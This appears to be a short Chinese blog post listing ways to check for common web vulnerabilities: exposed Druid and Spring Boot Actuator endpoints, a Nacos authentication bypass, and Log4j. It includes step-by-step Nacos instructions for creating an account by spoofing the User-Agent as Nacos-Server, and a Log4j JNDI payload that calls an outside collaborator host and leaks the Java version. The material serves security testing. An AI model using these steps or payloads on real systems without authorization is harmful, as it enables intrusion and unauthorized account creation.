部分漏洞检测方式

1、druid未授权访问

https://XXX.XXX.XXX/druid/index.html

1、简介

Actuator是Spring Boot提供的服务监控和管理中间件,默认配置会出现接口未授权访问,部分接口会泄露网站流量信息和内存信息等,使用Jolokia库特性甚至可以远程执行任意代码,获取服务器权限。

2、Spring Boot Actuator未授权访问

访问以下路径,如果有返回值代表存在该漏洞

https://XXX.XXX.XXX/actuator/env

http://XXX.XXX.XXX/actuator/mappings

/dump- 显示线程转储(包括堆栈跟踪)

/autoconfig- 显示自动配置报告

/configprops- 显示配置属性

/trace- 显示最后几条HTTP消息(可能包含会话标识符)

/logfile- 输出日志文件的内容

/shutdown- 关闭应用程序

/info- 显示应用信息

/metrics- 显示当前应用的’指标’信息

/health- 显示应用程序的健康指标

/beans- 显示Spring Beans的完整列表

/mappings- 显示所有MVC控制器映射

/env- 提供对配置环境的访问

/restart- 重新启动应用程序

3、nacos漏洞

简介:Dynamic Naming and Configuration Service及注册配置中心,提供了一组简单易用的特性集,帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。

默认账号密码:nacos/nacos

漏洞复现:

1、http://xx.xx.xx.xx:8848/nacos/#/login访问nacos登录

2、http://xx.xx.xx.xx:8848/nacos/v1/auth/users/?pageNo=1&pageSize=9访问用户列表接口

3、新建账号密码

1》访问nacos/v1截取数据包

2〉地址改成nacos/v1/auth/users?username=nacos&password=nacos

3》get改成POST

4〉User-Agent值修改为Nacos-Server

5》提交数据包查看返回信息查看是否新建用户成功,成功后使用新建的账号密码登录即可

修复方案:升级版本

4、简介

1)ApacheLog4j 2是对Log4j的升级,它比其前身Log4j 1.x提供了重大改进,并提供了Logback中可用的许多改进,同时修复了Logback架构中的一些问题。是目前最优秀的Java日志框架之一。

2)漏洞验证

把服务器修改成你的服务器地址,即可得到响应的响应

${jndi:ldap://${sys:java.version}.collaborator.com}

你可能感兴趣的:(部分漏洞检测方式)